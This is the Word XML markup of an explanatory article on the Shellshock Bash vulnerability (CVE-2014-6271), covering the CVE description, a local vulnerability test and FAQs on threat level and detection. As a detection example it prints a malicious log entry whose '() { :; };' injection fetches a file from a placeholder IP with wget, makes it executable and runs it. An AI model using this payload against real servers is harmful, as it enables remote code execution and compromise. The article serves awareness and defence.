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37B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:before="75" w:after="90" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>HOW TO EXPLOIT SHELLSHOCK VULNERABILITY CVE 2014-6271</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="111111"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>SHARE</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tooltip="Like" w:history="1">
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="111111"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>0</w:t>
        </w:r>
      </w:hyperlink>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A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.</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Shellshock</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, also known as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Bashdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.</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GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ForceCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> feature in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>OpenSSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>mod_cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>mod_cgid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> modules in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Apache HTTP Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, scripts executed by unspecified </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>DHCP clients</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ShellShock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</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Source:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>cve.mitre.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:after="255" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>ANATOMY OF THE ATTACK</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Test your environment</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Just run this bash script in your system and you will see if you are vulnerable or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A737B" w:rsidRPr="00AA737B" w:rsidTr="00AA737B">
        <w:trPr>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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>env</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>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'VAR=() { :;}; echo Bash is vulnerable!'</w:t>
            </w:r>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'FUNCTION()=() { :;}; echo Bash is vulnerable!'</w:t>
            </w:r>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bash</w:t>
            </w:r>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-c "echo Bash Test"</w:t>
            </w:r>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Is there threat to online banking?</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This vulnerability is being actively exploited to target servers hosted on the Internet. Even some workstations running </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>OSX</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are vulnerable, but an attacker would still need to find an attack vector that will work remotely against your desktop. Proof of concept targeting *nix workstation </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> clients has been released, but most workstation </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> process policies prevent actions from this sort of exploit by default.</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Exploit attempts that we observed are targeting server vulnerabilities and downloading </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> bots</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> for further </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. It is likely that servers hosting PII and handling sensitive merchant data are being attacked as well, but we have not yet observed it. There are merchants that unfortunately do not patch quickly.</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Can I detect if someone has exploited this against me?</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We would recommend reviewing your HTTP logs and check if there is anything suspicious. An example of a malicious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A737B" w:rsidRPr="00AA737B" w:rsidTr="00AA737B">
        <w:trPr>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192.168.1.1 – – [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0"</w:t>
            </w:r>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 xml:space="preserve">400 349 "() { :; }; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -O /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>besh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId7" w:history="1">
              <w:r w:rsidRPr="00AA737B">
                <w:rPr>
                  <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://192.168.1.1/filename;</w:t>
              </w:r>
            </w:hyperlink>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chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 777  /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>besh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>besh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>;"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">There are also some patches for bash that log every command that is being passed to the bash interpreter. This is a good way to see if someone has exploited your machine. It won’t prevent someone from exploiting this vulnerability, but it will log the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> actions on the system.</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How serious is the threat?</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This bug is very dangerous indeed, but not </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>EVERY</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> system is vulnerable. Special conditions must be met for a web server to be exploited. One of the biggest problems now is that when patches are published, researchers will look for other ways to exploit bash, explore different conditions that enable it to be exploited, etc. So a patch that helps prevent remote code execution can’t do anything against, for example, a file overwrite. So there will probably be a series of patches and in the meantime systems are still vulnerable.</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 xml:space="preserve">Is it the new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Heartbleed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>?</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 xml:space="preserve">Well, it’s much easier for a cybercriminal to exploit than </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Heartbleed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Also, in the case of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Heartbleed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a cybercriminal could only steal data from memory, hoping to find something interesting. By contrast, the bash vulnerability makes full system control much more possible. So it would seem to be more dangerous.</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Can it be used in future APT attacks?</w:t>
      </w:r>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It could be used for future malware development, of course. Malware could be used to automatically test infrastructure for such a bug, to infect the system or attack it in some other way.</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CGI-Based Web Server</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When a web server uses the </w:t>
      </w:r>
